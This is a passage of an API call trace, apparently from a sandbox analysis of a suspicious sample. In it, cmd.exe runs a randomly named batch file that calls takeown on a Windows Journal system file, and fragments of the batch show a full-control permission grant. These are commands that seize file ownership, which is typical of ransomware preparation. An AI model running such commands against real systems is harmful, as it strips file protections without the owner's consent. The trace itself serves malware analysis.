_String2="DEL") returned 16 [0246.399] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0246.399] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0246.399] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0246.399] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0246.399] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0246.399] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0246.399] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0246.399] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0246.399] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0246.399] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0246.399] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0246.399] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0246.399] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0246.399] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0246.399] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0246.399] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0246.399] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0246.399] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0246.399] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0246.399] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0246.399] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0246.399] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0246.399] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0246.399] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0246.399] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0246.400] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0246.400] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0246.400] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0246.400] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0246.400] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0246.400] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0246.400] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0246.400] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0246.400] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0246.400] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0246.400] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0246.400] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0246.400] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0246.400] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0246.401] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x756218, lpFilePart=0x3df150 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3df150*="Desktop") returned 0x25 [0246.401] SetErrorMode (uMode=0x0) returned 0x1 [0246.401] GetProcessHeap () returned 0x740000 [0246.401] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x756210, Size=0x64) returned 0x756210 [0246.401] GetProcessHeap () returned 0x740000 [0246.401] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x756210) returned 0x64 [0246.401] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0246.401] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0246.401] GetProcessHeap () returned 0x740000 [0246.402] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x120) returned 0x756280 [0246.402] GetProcessHeap () returned 0x740000 [0246.402] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x238) returned 0x7563a8 [0246.402] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0246.402] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x3deecc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deecc) returned 0xffffffff [0246.402] GetLastError () returned 0x2 [0246.403] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x3deecc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deecc) returned 0xffffffff [0246.403] GetLastError () returned 0x2 [0246.403] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0246.404] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x3deecc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deecc) returned 0x756558 [0246.404] FindClose (in: hFindFile=0x756558 | out: hFindFile=0x756558) returned 1 [0246.404] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x3deecc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deecc) returned 0xffffffff [0246.404] GetLastError () returned 0x2 [0246.405] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x3deecc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deecc) returned 0x756558 [0246.405] FindClose (in: hFindFile=0x756558 | out: hFindFile=0x756558) returned 1 [0246.405] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0246.405] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0246.405] GetConsoleTitleW (in: lpConsoleTitle=0x3def1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0246.406] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x756ce8, lpFilePart=0x3dea3c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3dea3c*="Desktop") returned 0x25 [0246.406] SetErrorMode (uMode=0x0) returned 0x1 [0246.406] GetProcessHeap () returned 0x740000 [0246.406] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x756ce0, Size=0x64) returned 0x756ce0 [0246.406] GetProcessHeap () returned 0x740000 [0246.406] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x756ce0) returned 0x64 [0246.406] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0246.406] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0246.406] GetProcessHeap () returned 0x740000 [0246.406] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x120) returned 0x756810 [0246.406] GetProcessHeap () returned 0x740000 [0246.406] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x238) returned 0x756938 [0246.406] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0246.407] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x3de7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de7b8) returned 0xffffffff [0246.407] GetLastError () returned 0x2 [0246.407] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x3de7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de7b8) returned 0xffffffff [0246.407] GetLastError () returned 0x2 [0246.408] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0246.408] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x3de7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de7b8) returned 0x756ae8 [0246.408] FindClose (in: hFindFile=0x756ae8 | out: hFindFile=0x756ae8) returned 1 [0246.408] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x3de7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de7b8) returned 0xffffffff [0246.408] GetLastError () returned 0x2 [0246.409] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x3de7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de7b8) returned 0x756ae8 [0246.409] FindClose (in: hFindFile=0x756ae8 | out: hFindFile=0x756ae8) returned 1 [0246.409] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0246.409] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0246.409] GetConsoleTitleW (in: lpConsoleTitle=0x3decb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0246.409] InitializeProcThreadAttributeList (in: lpAttributeList=0x3deb38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3dec00 | out: lpAttributeList=0x3deb38, lpSize=0x3dec00) returned 1 [0246.409] UpdateProcThreadAttribute (in: lpAttributeList=0x3deb38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3debf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3deb38, lpPreviousValue=0x0) returned 1 [0246.409] GetStartupInfoW (in: lpStartupInfo=0x3deaf4 | out: lpStartupInfo=0x3deaf4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0246.410] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0246.410] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3deb94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3debe0 | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"", lpProcessInformation=0x3debe0*(hProcess=0x78, hThread=0x74, dwProcessId=0x6f4, dwThreadId=0x6dc)) returned 1 [0246.430] CloseHandle (hObject=0x74) returned 1 [0246.430] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0246.430] GetProcessHeap () returned 0x740000 [0246.430] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a120 | out: hHeap=0x740000) returned 1 [0246.430] GetEnvironmentStringsW () returned 0x757f38* [0246.430] GetProcessHeap () returned 0x740000 [0246.430] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xb5c) returned 0x75a120 [0246.430] FreeEnvironmentStringsW (penv=0x757f38) returned 1 [0246.430] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0247.988] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3dead4 | out: lpExitCode=0x3dead4*=0x0) returned 1 [0247.988] CloseHandle (hObject=0x78) returned 1 [0247.988] _vsnwprintf (in: _Buffer=0x3dec1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3deae0 | out: _Buffer="00000000") returned 8 [0247.988] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0247.988] GetProcessHeap () returned 0x740000 [0247.988] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a120 | out: hHeap=0x740000) returned 1 [0247.988] GetEnvironmentStringsW () returned 0x757f38* [0247.989] GetProcessHeap () returned 0x740000 [0247.989] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xb5c) returned 0x75a120 [0247.989] FreeEnvironmentStringsW (penv=0x757f38) returned 1 [0247.989] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0247.989] GetProcessHeap () returned 0x740000 [0247.989] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a120 | out: hHeap=0x740000) returned 1 [0247.989] GetEnvironmentStringsW () returned 0x757f38* [0247.989] GetProcessHeap () returned 0x740000 [0247.989] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xb5c) returned 0x75a120 [0247.989] FreeEnvironmentStringsW (penv=0x757f38) returned 1 [0247.989] GetProcessHeap () returned 0x740000 [0247.989] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x740db8 | out: hHeap=0x740000) returned 1 [0247.989] DeleteProcThreadAttributeList (in: lpAttributeList=0x3deb38 | out: lpAttributeList=0x3deb38) [0247.989] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.989] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0247.990] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.990] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0247.990] _get_osfhandle (_FileHandle=0) returned 0x3 [0247.990] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0247.990] SetConsoleInputExeNameW () returned 0x1 [0247.991] GetConsoleOutputCP () returned 0x1b5 [0247.991] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0247.991] SetThreadUILanguage (LangId=0x0) returned 0x409 [0247.991] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3df354, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0247.992] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0247.992] _get_osfhandle (_FileHandle=3) returned 0x78 [0247.992] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0247.992] GetProcessHeap () returned 0x740000 [0247.992] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756a68 | out: hHeap=0x740000) returned 1 [0247.992] GetProcessHeap () returned 0x740000 [0247.993] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756938 | out: hHeap=0x740000) returned 1 [0247.993] GetProcessHeap () returned 0x740000 [0247.993] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756810 | out: hHeap=0x740000) returned 1 [0247.993] GetProcessHeap () returned 0x740000 [0247.993] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756ce0 | out: hHeap=0x740000) returned 1 [0247.993] GetProcessHeap () returned 0x740000 [0247.993] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756770 | out: hHeap=0x740000) returned 1 [0247.993] GetProcessHeap () returned 0x740000 [0247.993] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756558 | out: hHeap=0x740000) returned 1 [0247.993] GetProcessHeap () returned 0x740000 [0247.993] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7564d8 | out: hHeap=0x740000) returned 1 [0247.993] GetProcessHeap () returned 0x740000 [0247.993] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7563a8 | out: hHeap=0x740000) returned 1 [0247.993] GetProcessHeap () returned 0x740000 [0247.993] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756280 | out: hHeap=0x740000) returned 1 [0247.993] GetProcessHeap () returned 0x740000 [0247.993] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756210 | out: hHeap=0x740000) returned 1 [0247.993] GetProcessHeap () returned 0x740000 [0247.993] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756180 | out: hHeap=0x740000) returned 1 [0247.993] GetProcessHeap () returned 0x740000 [0247.993] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7412a0 | out: hHeap=0x740000) returned 1 [0247.993] GetProcessHeap () returned 0x740000 [0247.993] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x741240 | out: hHeap=0x740000) returned 1 [0247.994] _get_osfhandle (_FileHandle=3) returned 0x78 [0247.994] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0247.994] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3df338, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3df338*=0xb3, lpOverlapped=0x0) returned 1 [0247.994] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0247.994] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0247.994] _get_osfhandle (_FileHandle=3) returned 0x78 [0247.994] GetFileType (hFile=0x78) returned 0x1 [0247.995] _get_osfhandle (_FileHandle=3) returned 0x78 [0247.995] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0247.995] GetProcessHeap () returned 0x740000 [0247.995] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x400a) returned 0x764ab0 [0247.995] GetProcessHeap () returned 0x740000 [0247.995] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x7a) returned 0x741240 [0247.995] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui", nBufferLength=0x208, lpBuffer=0x3deac8, lpFilePart=0x3deac0 | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui", lpFilePart=0x3deac0*="MSPVWCTL.DLL.mui") returned 0x37 [0247.995] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x3de7dc | out: lpFindFileData=0x3de7dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x756180 [0247.996] FindClose (in: hFindFile=0x756180 | out: hFindFile=0x756180) returned 1 [0247.996] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0247.996] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0x3de7dc | out: lpFindFileData=0x3de7dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 0x756180 [0247.996] FindClose (in: hFindFile=0x756180 | out: hFindFile=0x756180) returned 1 [0247.996] _wcsnicmp (_String1="WI0FCF~1", _String2="Windows Journal", _MaxCount=0xf) returned -62 [0247.996] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US", lpFindFileData=0x3de7dc | out: lpFindFileData=0x3de7dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e4268f4, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa35bb41, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0x756180 [0247.996] FindClose (in: hFindFile=0x756180 | out: hFindFile=0x756180) returned 1 [0247.996] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui", lpFindFileData=0x3de7dc | out: lpFindFileData=0x3de7dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSPVWCTL.DLL.mui", cAlternateFileName="")) returned 0x756180 [0247.996] FindClose (in: hFindFile=0x756180 | out: hFindFile=0x756180) returned 1 [0247.997] GetProcessHeap () returned 0x740000 [0247.997] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x2a) returned 0x7555e8 [0247.997] GetProcessHeap () returned 0x740000 [0247.997] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x764ab0 | out: hHeap=0x740000) returned 1 [0247.999] _tell (_FileHandle=3) returned 63 [0247.999] _close (_FileHandle=3) returned 0 [0247.999] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df10c | out: _Buffer="\r\n") returned 2 [0247.999] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.999] GetFileType (hFile=0x7) returned 0x2 [0248.000] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.000] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0cc | out: lpMode=0x3df0cc) returned 1 [0248.000] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.000] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df0f8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df0f8*=0x2) returned 1 [0248.002] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0248.002] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0248.002] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3df108 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0248.003] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3df108 | out: _Buffer=">") returned 1 [0248.003] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.003] GetFileType (hFile=0x7) returned 0x2 [0248.003] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.003] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0d0 | out: lpMode=0x3df0d0) returned 1 [0248.004] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.004] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3df0fc, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3df0fc*=0x26) returned 1 [0248.004] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.004] GetFileType (hFile=0x7) returned 0x2 [0248.005] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.005] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df354 | out: lpMode=0x3df354) returned 1 [0248.005] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.005] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x740dc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3df380, lpReserved=0x0 | out: lpBuffer=0x740dc0*, lpNumberOfCharsWritten=0x3df380*=0x3) returned 1 [0248.006] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3df38c | out: _Buffer=" FN=\"MSPVWCTL.DLL.mui\" ") returned 23 [0248.006] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.006] GetFileType (hFile=0x7) returned 0x2 [0248.006] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.006] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df34c | out: lpMode=0x3df34c) returned 1 [0248.007] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.007] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x17, lpNumberOfCharsWritten=0x3df378, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df378*=0x17) returned 1 [0248.007] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df3ac | out: _Buffer="\r\n") returned 2 [0248.007] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.007] GetFileType (hFile=0x7) returned 0x2 [0248.008] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.008] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df36c | out: lpMode=0x3df36c) returned 1 [0248.008] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.008] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df398, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df398*=0x2) returned 1 [0248.010] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0248.010] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0248.010] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0248.010] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0248.010] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0248.010] _wcsicmp (_String1="set", _String2="CD") returned 16 [0248.010] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0248.010] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0248.010] _wcsicmp (_String1="set", _String2="REN") returned 1 [0248.010] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0248.010] _wcsicmp (_String1="set", _String2="SET") returned 0 [0248.010] GetConsoleTitleW (in: lpConsoleTitle=0x3def1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0248.011] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0248.012] SetEnvironmentVariableW (lpName="FN", lpValue="\"MSPVWCTL.DLL.mui\"") returned 1 [0248.012] GetProcessHeap () returned 0x740000 [0248.012] HeapFree (in: hHeap=0x740000, dwFlags=0x0, 